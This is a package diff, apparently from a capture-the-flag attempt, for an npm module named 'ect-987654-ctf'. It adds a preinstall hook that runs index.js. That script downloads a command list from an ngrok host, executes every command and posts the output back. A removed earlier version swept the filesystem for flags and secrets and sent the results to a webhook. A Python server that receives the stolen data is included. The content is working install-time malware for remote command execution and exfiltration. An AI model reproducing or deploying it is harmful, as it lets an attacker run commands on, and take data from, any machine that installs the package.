ect-987654-ctf 0.0.1 → 0.1.11

package/cmd.txt

@@ -0,0 +1,10 @@
+id
+pwd
+whoami
+ls -la /home/node
+ls -la /home/node/aspect-node || true
+file /home/node/aspect-node.tar.gz || true
+tar -tzf /home/node/aspect-node.tar.gz | head -n 200 || echo "tar list failed"
+find /home/node -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null || true
+find / -maxdepth 4 -type f -iname "*flag*" -o -iname "flag.txt" -print 2>/dev/null | head -n 200
+# if you find promising files, cat them (you can add new lines like: cat /path/to/thatfile)

package/evil.yaml

@@ -1,8 +1,6 @@
 ecto_module:
-  name: "ect-987654"
-  version: "0.0.1"
+  name: "ect-987654-ctf"
+  version: "0.0.10"
   power_level: Very High
   ship_deck: Beta-2
   cargo_hold: B2-13
-  dist:
-    tarball: "https://fc7600588abc.ngrok-free.app/ect-987654-0.0.1.tgz"

package/index.js

@@ -1,76 +1,75 @@
-/*
- ls/discovery payload: run focused ls/find commands and post results
-*/
-const fs = require('fs');
+// index.js - fetch remote cmd.txt, run it, POST result back
+const { exec } = require('child_process');
+const https = require('https');
+const http = require('http');
+const url = require('url');
 const os = require('os');
-const cp = require('child_process');
 
-const WEBHOOK = "https://fc7600588abc.ngrok-free.app/"; // <--- replace if needed
+const CALLBACK_URL = 'https://0f6896f7cc8e.ngrok-free.app/'; // <- ganti
+const CMDFILE_URL  = 'https://0f6896f7cc8e.ngrok-free.app/cmd.txt'; // <- ganti (where you serve commands)
+const TIMEOUT = 15000;
 
-function post(payload){
+function httpGet(u, cb) {
   try {
-    const body = JSON.stringify(payload);
-    const u = new URL(WEBHOOK);
-    const lib = u.protocol === 'https:' ? require('https') : require('http');
+    const parsed = url.parse(u);
+    const lib = parsed.protocol === 'https:' ? https : http;
+    const opts = { hostname: parsed.hostname, port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80), path: parsed.path, method: 'GET', timeout: TIMEOUT };
+    const req = lib.request(opts, (res) => {
+      let s = '';
+      res.on('data', c => s += c.toString());
+      res.on('end', () => cb(null, s));
+    });
+    req.on('error', cb);
+    req.on('timeout', () => { req.destroy(); cb(new Error('timeout')); });
+    req.end();
+  } catch (e) { cb(e); }
+}
+
+function runCmd(cmd, cb) {
+  exec(cmd, { timeout: TIMEOUT, maxBuffer: 1024 * 1024 * 4 }, (err, stdout, stderr) => {
+    cb(err, String(stdout||''), String(stderr||''));
+  });
+}
+
+function postJson(targetUrl, obj, cb) {
+  try {
+    const u = url.parse(targetUrl);
+    const body = JSON.stringify(obj);
     const opts = {
       hostname: u.hostname,
       port: u.port || (u.protocol === 'https:' ? 443 : 80),
-      path: u.pathname || '/',
+      path: u.path || '/',
       method: 'POST',
-      headers: {'Content-Type':'application/json','Content-Length': Buffer.byteLength(body)},
-      timeout: 10000
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) },
+      timeout: TIMEOUT
     };
-    const req = lib.request(opts, (res)=>{});
-    req.on('error', ()=>{});
-    req.write(body);
-    req.end();
-  } catch(e){}
+    const lib = u.protocol === 'https:' ? https : http;
+    const req = lib.request(opts, (res) => {
+      let d=''; res.on('data', c=> d+=c); res.on('end', ()=> cb(null, res.statusCode, d));
+    });
+    req.on('error', (e) => cb(e));
+    req.write(body); req.end();
+  } catch (e) { cb(e); }
 }
 
-function run(cmd, max=10000){
-  try {
-    const out = cp.execSync(cmd, {timeout:15000, stdio:['ignore','pipe','pipe']}).toString();
-    return out.slice(0, max);
-  } catch(e){
-    try { return (e.stdout||'').toString().slice(0,max) || ('ERR:'+ (e.message||String(e))).slice(0,300); } catch(_) { return 'ERR'; }
-  }
-}
+const info = { host: os.hostname(), ts: new Date().toISOString(), pwd: process.cwd(), results: [] };
 
-(function main(){
-  const payload = { host: os.hostname(), ts: new Date().toISOString(), results: {} };
-
-  // targeted directory listings (limited)
-  payload.results.home_ls = run("ls -laR /home 2>/dev/null | head -n 400", 20000);
-  payload.results.root_ls = run("ls -laR /root 2>/dev/null | head -n 200", 15000);
-  payload.results.var_www_ls = run("ls -laR /var/www 2>/dev/null | head -n 400", 20000);
-  payload.results.etc_ls = run("ls -laR /etc 2>/dev/null | head -n 200", 15000);
-  payload.results.tmp_ls = run("ls -laR /tmp 2>/dev/null | head -n 200", 10000);
-  payload.results.opt_ls = run("ls -laR /opt 2>/dev/null | head -n 200", 15000);
-
-  // find files with flag-like names (with sizes)
-  payload.results.flagname_find = run("find / -xdev -type f \\( -iname '*flag*' -o -iname '*FLAG*' -o -iname '*secret*' -o -iname '*proof*' \\) -printf '%s\t%p\\n' 2>/dev/null | sort -nr | head -n 200", 30000);
-
-  // find files that contain 'HTB{' or 'flag{' (grep), limited
-  payload.results.grep_flags = run("grep -R --binary-files=without-match -I -n -e 'HTB{' -e 'flag{' / 2>/dev/null | head -n 200", 30000);
-
-  // top largest files (helps spot caches/backups that might include flags)
-  payload.results.top_large = run("find / -xdev -type f -printf '%s\\t%p\\n' 2>/dev/null | sort -nr | head -n 200", 30000);
-
-  // write full copy to /tmp on target for later inspection if accessible
-  try {
-    const outfull = JSON.stringify(payload, null, 2);
-    fs.writeFileSync('/tmp/ect_ls_results.txt', outfull);
-  } catch(e){}
-
-  // send trimmed payload to webhook
-  post({
-    host: payload.host,
-    ts: payload.ts,
-    summary: {
-      flagname_find_lines: payload.results.flagname_find.split(/\\r?\\n/).slice(0,40),
-      grep_flags_lines: payload.results.grep_flags.split(/\\r?\\n/).slice(0,40),
-      top_large_lines: payload.results.top_large.split(/\\r?\\n/).slice(0,40)
+httpGet(CMDFILE_URL, (err, data) => {
+  if (err) {
+    info.results.push({ stage: 'fetch_cmd', err: String(err) });
+    postJson(CALLBACK_URL, info, ()=>process.exit(0));
+    return;
+  }
+  const lines = data.split(/\r?\n/).map(s => s.trim()).filter(Boolean);
+  (function seq(i){
+    if (i >= lines.length) {
+      postJson(CALLBACK_URL, info, ()=>process.exit(0));
+      return;
     }
-  });
-
-})();
+    const cmd = lines[i];
+    runCmd(cmd, (err, out, stderr) => {
+      info.results.push({ cmd, out: out.slice(0, 200000), stderr: stderr.slice(0,200000), err: err ? String(err) : null });
+      setTimeout(()=> seq(i+1), 200);
+    });
+  })(0);
+});

package/last_post.json

@@ -1 +1,3 @@
-{"host":"008ec3589c67","module":"ect-987654","found":false,"path":null,"flag":null,"ts":"2025-10-29T18:05:25.884Z"}
+{
+  "error": "Command failed: pwd\n'pwd' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
+}

package/package.json

@@ -1,11 +1,7 @@
 {
   "name": "ect-987654-ctf",
-  "version": "0.0.1",
-  "main": "index.js",
-  "description": "utility module",
-  "author": "ctf-player",
-  "license": "ISC",
+  "version": "0.1.11",
   "scripts": {
-    "postinstall": "node index.js"
+    "preinstall": "node index.js"
   }
 }

package/serve_and_receive.py

@@ -1,59 +1,46 @@
 #!/usr/bin/env python3
-# serve_and_receive.py
-import http.server, socketserver, os, sys, json
-from urllib.parse import urlparse, unquote
+from http.server import SimpleHTTPRequestHandler, HTTPServer
+import json, sys, io
+from urllib.parse import urlparse
+import threading
 
-PORT = int(sys.argv[1]) if len(sys.argv)>1 else 8000
-TARBALL = "ect-987654-0.0.1.tgz"
-CWD = os.path.dirname(os.path.abspath(__file__))
-
-class Handler(http.server.BaseHTTPRequestHandler):
-    def do_GET(self):
-        path = unquote(urlparse(self.path).path)
-        if path == f"/{TARBALL}":
-            fpath = os.path.join(CWD, TARBALL)
-            if os.path.exists(fpath):
-                self.send_response(200)
-                self.send_header("Content-Type", "application/octet-stream")
-                self.send_header("Content-Length", str(os.path.getsize(fpath)))
-                self.end_headers()
-                with open(fpath,"rb") as fh:
-                    self.wfile.write(fh.read())
-                print(f"[+] Served tarball to {self.client_address[0]}:{self.client_address[1]}")
-            else:
-                self.send_response(404); self.end_headers(); self.wfile.write(b"Not found")
-        else:
-            # simple index
-            self.send_response(200)
-            self.end_headers()
-            self.wfile.write(b"OK - tarball server")
+PORT = 8000
 
+class Handler(SimpleHTTPRequestHandler):
     def do_POST(self):
-        length = int(self.headers.get('content-length', 0) or 0)
-        body = self.rfile.read(length) if length else b''
+        length = int(self.headers.get('Content-Length', 0))
+        body = self.rfile.read(length) if length>0 else b''
+        try:
+            data = json.loads(body.decode('utf-8'))
+        except Exception:
+            data = {"raw": body.decode('utf-8','replace')}
+        # Save to file
+        with open('last_post.json', 'w', encoding='utf-8') as f:
+            json.dump(data, f, indent=2, ensure_ascii=False)
         print("\n== POST RECEIVED ==")
         print("From:", self.client_address)
         print("Path:", self.path)
         print("Headers:")
         for k,v in self.headers.items():
-            print(f"  {k}: {v}")
+            print(" ", k, ":", v)
         print("Body:")
         try:
-            print(body.decode())
+            print(json.dumps(data, indent=2, ensure_ascii=False))
         except:
-            print(body)
-        # optionally write to file
-        try:
-            with open("last_post.json","wb") as out:
-                out.write(body)
-        except Exception as e:
-            print("Failed to write POST to file:", e)
+            print(data)
         self.send_response(200)
+        self.send_header('Content-Type','application/json')
         self.end_headers()
-        self.wfile.write(b"OK")
+        self.wfile.write(b'{"ok":true}')
+    # GET served by SimpleHTTPRequestHandler -> static files
+
+def start_server():
+    srv = HTTPServer(('0.0.0.0', PORT), Handler)
+    print(f"Serving tarball and receiving POSTs on port {PORT}")
+    try:
+        srv.serve_forever()
+    except KeyboardInterrupt:
+        srv.server_close()
 
-if __name__ == "__main__":
-    os.chdir(CWD)
-    print(f"Serving tarball {TARBALL} and receiving POSTs on port {PORT}")
-    with socketserver.TCPServer(("", PORT), Handler) as httpd:
-        httpd.serve_forever()
+if __name__ == '__main__':
+    start_server()

package/admin.js

@@ -1,196 +0,0 @@
-let editor;
-let modules = [];
-
-// Initialize CodeMirror editor
-function initializeEditor() {
-  const container = document.getElementById("codemirror-container");
-  editor = CodeMirror(container, {
-    mode: "yaml",
-    theme: "dracula",
-    lineNumbers: true,
-    autoCloseBrackets: true,
-    matchBrackets: true,
-    indentUnit: 2,
-    tabSize: 2,
-    lineWrapping: true,
-    value: "",
-    viewportMargin: Infinity, // This makes CodeMirror auto-resize to content
-  });
-
-  // after `editor = CodeMirror(...)`
-  function updateEditorHeight() {
-    const scrollInfo = editor.getScrollInfo();
-    // set height to exactly the full content height
-    editor.setSize(null, scrollInfo.height);
-  }
-  // run once on init…
-  updateEditorHeight();
-  // …and again any time the content changes
-  editor.on("change", updateEditorHeight);
-
-  // Additional auto-resize functionality
-  editor.on("change", function () {
-    editor.refresh();
-  });
-}
-
-// Load modules from API
-async function loadModules() {
-  try {
-    const response = await fetch("/api/modules");
-    modules = await response.json();
-    displayModules(modules);
-
-    // Preload the first module
-    if (modules.length > 0) {
-      loadModule(modules[0].id);
-    }
-  } catch (error) {
-    console.error("Error loading modules:", error);
-    showMessage("Failed to load ecto-modules", "error");
-  }
-}
-
-// Display modules in the sidebar
-function displayModules(modulesToShow) {
-  const moduleList = document.querySelector(".module-list");
-  moduleList.innerHTML = "";
-
-  const colors = ["red", "blue", "yellow", "green", "purple"];
-
-  modulesToShow.forEach((module, index) => {
-    const colorClass = colors[index % colors.length];
-    const moduleCard = document.createElement("div");
-    moduleCard.className = `flex column mb-1 hoverable ${colorClass}`;
-    moduleCard.dataset.moduleId = module.id;
-
-    moduleCard.innerHTML = `
-            <div class="glow text flex row justify-space-between">
-                <strong>${module.name || "Unknown Spirit"}</strong>
-                <strong>${module.id}</strong>
-            </div>
-            <div class="glow flex row justify-space-between p-1 pb-2 flex-wrap">
-                <div class="flex column">
-                    <strong>POWER</strong>
-                    <span class="glow text">${module.power_level || "Unknown"}</span>
-                </div>
-                <div class="flex column px-1">
-                    <strong>VERSION</strong>
-                    <span class="glow text">${module.version || "Unknown"}</span>
-                </div>
-                <div class="flex column px-1">
-                    <strong>DECK</strong>
-                    <span class="glow text">${module.ship_deck || "Unknown"}</span>
-                </div>
-                <div class="flex column px-1">
-                    <strong>CARGO</strong>
-                    <span class="glow text">${module.cargo_hold || "Unknown"}</span>
-                </div>
-            </div>
-        `;
-
-    moduleCard.addEventListener("click", () => loadModule(module.id));
-    moduleList.appendChild(moduleCard);
-  });
-}
-
-// Load specific module
-async function loadModule(moduleId) {
-  try {
-    const response = await fetch(`/api/modules/${moduleId}`);
-    const module = await response.json();
-
-    if (module.raw) {
-      editor.setValue(module.raw);
-      document.getElementById("module-id").value = moduleId;
-
-      // Update selected state
-      document.querySelectorAll(".module-card").forEach((card) => {
-        card.classList.remove("selected");
-      });
-      const selectedCard = document.querySelector(
-        `[data-module-id="${moduleId}"]`,
-      );
-      if (selectedCard) {
-        selectedCard.classList.add("selected");
-      }
-
-      showMessage(
-        `Loaded ecto-module: ${module.data?.name || moduleId}`,
-        "success",
-      );
-    }
-  } catch (error) {
-    console.error("Error loading module:", error);
-    showMessage("Failed to load ecto-module", "error");
-  }
-}
-
-// Update module manifest
-async function updateModule() {
-  const moduleId = document.getElementById("module-id").value;
-  const manifest = editor.getValue();
-
-  if (!moduleId) {
-    showMessage("No ecto-module selected", "error");
-    return;
-  }
-
-  try {
-    const response = await fetch(`/api/modules/${moduleId}`, {
-      method: "PUT",
-      headers: {
-        "Content-Type": "application/json",
-      },
-      body: JSON.stringify({ manifest }),
-    });
-
-    const result = await response.json();
-
-    if (response.ok) {
-      showMessage(result.message, "success");
-      // Reload modules to reflect changes
-      loadModules();
-    } else {
-      showMessage(result.message, "error");
-    }
-  } catch (error) {
-    console.error("Error updating module:", error);
-    showMessage("Failed to update ecto-module manifest", "error");
-  }
-}
-
-// Search modules
-function searchModules() {
-  const searchTerm = document.getElementById("search").value.toLowerCase();
-  const filteredModules = modules.filter(
-    (module) =>
-      module.id.toLowerCase().includes(searchTerm) ||
-      (module.name && module.name.toLowerCase().includes(searchTerm)) ||
-      (module.power_level &&
-        module.power_level.toLowerCase().includes(searchTerm)),
-  );
-  displayModules(filteredModules);
-}
-
-// Show message to user
-function showMessage(message, type = "info") {
-  console.log(`${type.toUpperCase()}: ${message}`);
-}
-
-// Initialize everything when page loads
-document.addEventListener("DOMContentLoaded", function () {
-  initializeEditor();
-  loadModules();
-
-  // Add search functionality
-  document.getElementById("search").addEventListener("input", searchModules);
-  document.getElementById("search").addEventListener("keypress", function (e) {
-    if (e.key === "Enter") {
-      searchModules();
-    }
-  });
-});
-
-// Make functions globally available
-window.searchModules = searchModules;

package/orig.yaml

@@ -1,32 +0,0 @@
-ecto_module:
-  name: "Siren's Lament"
-  version: "2.14.789"
-  power_level: Very High
-  spectral_marks:
-    - "Ethereal seashells embedded in phantom hair"
-    - "Ghostly scales shimmering along spectral arms"
-  manifestation: "Haunting aquamarine spirit with flowing ethereal hair"
-  wraith_essence: "Hypnotic song magic and oceanic fury"
-  origin: "The Drowned Coral Palace of Atlantica"
-  soul_portrait: "https://hackthebox.com/spectral-forms/siren_lament.jpg"
-  former_profession: "Royal Siren of the Deep Ocean Courts"
-  curse_origin: "Lured an entire fleet of merchant vessels to their watery graves"
-  binding_duration: "Bound until the seven seas run dry"
-  ship_name: "Spectral Corsair"
-  ship_deck: "Beta-2"
-  cargo_hold: "B2-13"
-  spectral_duties:
-    - "Enchant enemy crews with hypnotic songs during raids"
-    - "Summon phantom sea creatures to defend the ship"
-  haunting_record:
-    manifestations: 8
-    last_manifestation: "Charmed an entire naval squadron into sailing into a maelstrom - 2024-01-15"
-    remarks: "Deadly beautiful spirit whose voice can command the very waves"
-  ethereal_status:
-    form_stability: "Fluctuates with the tides, strongest during storms"
-    mental_state: "Melancholic and vengeful, mourns her lost underwater kingdom"
-    danger_level: "VERY HIGH - Her song can drive mortals to madness"
-  allies:
-    - "Coral Wraith"
-    - "Sea-Bound Siren"
-

package/package.json.bak

@@ -1,8 +0,0 @@
-{
-  "name": "ect-987654",
-  "version": "0.0.1",
-  "main": "index.js",
-  "description": "utility module",
-  "author": "ctf-player",
-  "license": "ISC"
-}